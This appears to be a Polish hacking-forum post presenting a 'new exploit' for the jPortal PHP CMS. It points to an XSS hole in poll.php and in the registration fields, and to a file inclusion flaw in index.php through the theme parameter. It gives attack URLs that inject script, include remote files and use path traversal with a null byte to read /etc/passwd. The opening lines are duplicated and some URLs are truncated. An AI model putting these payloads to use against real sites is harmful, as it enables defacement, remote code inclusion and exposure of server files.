witam ,
nie patrzyłem czy był już taki temat ale jest nowy exploit na jp..
Opis:
Pozdrawiam .
nie patrzyłem czy był już taki temat ale jest nowy exploit na jp..
Opis:
a)XSS
Problem dotyczy sondy a mianowicie pliku poll.php a dokładniej:
<code>
echo 'Wyniki głosowania'.$poll_err;
</code>
można przez url dodać swój kodzik js bądź
vb(Uwaga trzeba pamiętać aby wcześniej zmiennej
cmd przypisać jakąś wartośc najlepiej old)
XSS występuje także w rejestracji i wystarczy w kraju lub miejscowości dać jakiś kod html aby wywalić
póżniej ładnie wyglądający jportal i troszkę go zniekształcić
b)includ'owanie dowolnego pliku
Bug występuje w pliku index.php.Oto dokładny kod:
<code>
include("theme/$theme/index.php");
</code>
Bądź wcześniejsze wersje jportal-a:
<code>
include("theme/$theme/functions.inc.php");
</code>
Można tu podmienić zmienną $theme na odpowiednią wartośćNaprzykład tak aby odwołała się do /etc/passwd
i kasowała wszystko co ma za sobą(%00)
Exploit:
a)XSS:
http://www.witek.pl/jp/poll.php?cmd=old&am...amiana%3C/h1%3E
Da nam to piękny napis "Dupa Damiana"
b)dołączanie dowolnego index.php na servie:
http://www.witek.pl/jp/index.php?theme=../../
Da nam to dołączenie pliku http://www.dupa.pl/index.php.Bądż na starszych wersjach jportala plik
http://www.dupa.pl/index.php
c)przeczytanie dowolnego pliku na servie:
http://www.dupa.pl/jp/index.php?theme=../...../etc/passwd%00
Da nam to przeczytanie pliku /etc/passwd of course jeżeli register_globals jest off [/b]
Pozdrawiam .